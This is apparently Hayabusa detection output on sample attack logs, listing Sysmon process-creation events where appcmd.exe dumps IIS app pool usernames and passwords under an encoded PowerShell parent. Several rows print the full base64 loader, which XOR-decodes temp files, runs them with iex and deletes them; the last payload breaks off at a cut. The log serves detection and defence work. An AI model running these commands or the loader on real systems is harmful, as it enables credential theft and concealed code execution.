10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 
+2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 
+2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBv
AGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbA
BlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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 | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAH
UAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAA
